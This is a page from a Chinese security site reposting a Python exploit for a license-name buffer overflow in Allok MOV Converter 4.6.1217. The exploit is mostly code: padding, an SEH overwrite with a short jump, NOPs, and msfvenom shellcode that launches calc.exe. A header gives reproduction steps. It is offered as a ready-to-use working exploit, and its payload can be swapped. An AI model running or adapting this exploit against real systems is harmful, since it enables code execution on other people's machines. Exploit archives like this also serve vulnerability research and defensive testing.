首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Allok MOV Converter 4.6.1217 Buffer Overflow
来源:spiritedwolf@protonmail.com 作者:Singh 发布时间:2018-07-31  
# Exploit Title     : Allok MOV Converter 4.6.1217 - Remote Buffer Overflow  
# Discovery by      : Shubham Singh
# Known As          : Spirited Wolf [Twitter: @Pwsecspirit]
# Email             : spiritedwolf@protonmail.com
# Youtube Channel   : www.youtube.com/c/Pentestingwithspirit 
# Discovey Date     : 29/07/2018
# Software Link     : http://www.alloksoft.com/allok_movconverter.exe
# Tested Version    : 4.6.1217
# Tested on OS      : Windows XP Service Pack 3 x86
# Steps to Reproduce: Run the python exploit script, it will create a new file with the name "exploit.txt" just copy the text inside "exploit.txt"
#                     Start the Allok MOV Converter 4.6.1217 program and in the Lisence name paste the content of "exploit.txt" and click on Register.
#                     You will see a sweet calculator poped up.
# Greetz            : @hexachordanu @FuzzySec @LiveOverflow

file = open("exploit.txt","wb")
junk = "\x41" * 780
nseh = "\xeb\x10\x90\x90" #Short Jump address
seh = "\x79\x25\x01\x76"  #0x76012579

nops = "\x90" * 16

#badchar \x00\x08\x09\x0a\x0b\x0c\x0d
#msfvenom -p windows/exec CMD=calc.exe -b '\x00\x08\x09\x0a\x0b\x0c\x0d' -f python
buf =  ""
buf += "\xba\xbb\xf0\xaa\x11\xdd\xc3\xd9\x74\x24\xf4\x5e\x31"
buf += "\xc9\xb1\x31\x83\xee\xfc\x31\x56\x0f\x03\x56\xb4\x12"
buf += "\x5f\xed\x22\x50\xa0\x0e\xb2\x35\x28\xeb\x83\x75\x4e"
buf += "\x7f\xb3\x45\x04\x2d\x3f\x2d\x48\xc6\xb4\x43\x45\xe9"
buf += "\x7d\xe9\xb3\xc4\x7e\x42\x87\x47\xfc\x99\xd4\xa7\x3d"
buf += "\x52\x29\xa9\x7a\x8f\xc0\xfb\xd3\xdb\x77\xec\x50\x91"
buf += "\x4b\x87\x2a\x37\xcc\x74\xfa\x36\xfd\x2a\x71\x61\xdd"
buf += "\xcd\x56\x19\x54\xd6\xbb\x24\x2e\x6d\x0f\xd2\xb1\xa7"
buf += "\x5e\x1b\x1d\x86\x6f\xee\x5f\xce\x57\x11\x2a\x26\xa4"
buf += "\xac\x2d\xfd\xd7\x6a\xbb\xe6\x7f\xf8\x1b\xc3\x7e\x2d"
buf += "\xfd\x80\x8c\x9a\x89\xcf\x90\x1d\x5d\x64\xac\x96\x60"
buf += "\xab\x25\xec\x46\x6f\x6e\xb6\xe7\x36\xca\x19\x17\x28"
buf += "\xb5\xc6\xbd\x22\x5b\x12\xcc\x68\x31\xe5\x42\x17\x77"
buf += "\xe5\x5c\x18\x27\x8e\x6d\x93\xa8\xc9\x71\x76\x8d\x26"
buf += "\x38\xdb\xa7\xae\xe5\x89\xfa\xb2\x15\x64\x38\xcb\x95"
buf += "\x8d\xc0\x28\x85\xe7\xc5\x75\x01\x1b\xb7\xe6\xe4\x1b"
buf += "\x64\x06\x2d\x78\xeb\x94\xad\x51\x8e\x1c\x57\xae"

more = "\x41" * 100
exploit = junk + nseh + seh + nops + buf + more

file.write(exploit)
file.close()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·ipPulse 1.92 Denial Of Service
·Microsoft Windows Kernel win32
·ipPulse 1.92 - 'IP Address/Hos
·H2 Database 1.4.197 Informatio
·WordPress Plugin Responsive Th
·fusermount Restriction Bypass
·NetScanTools Basic Edition 2.5
·Charles Proxy 4.2 Local Root P
·QNap QVR Client 5.1.1.30070 -
·Vtiger CRM 6.3.0 Authenticated
·Core FTP 2.0 - 'XRMD' Denial o
·SonicWall Global Management Sy
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved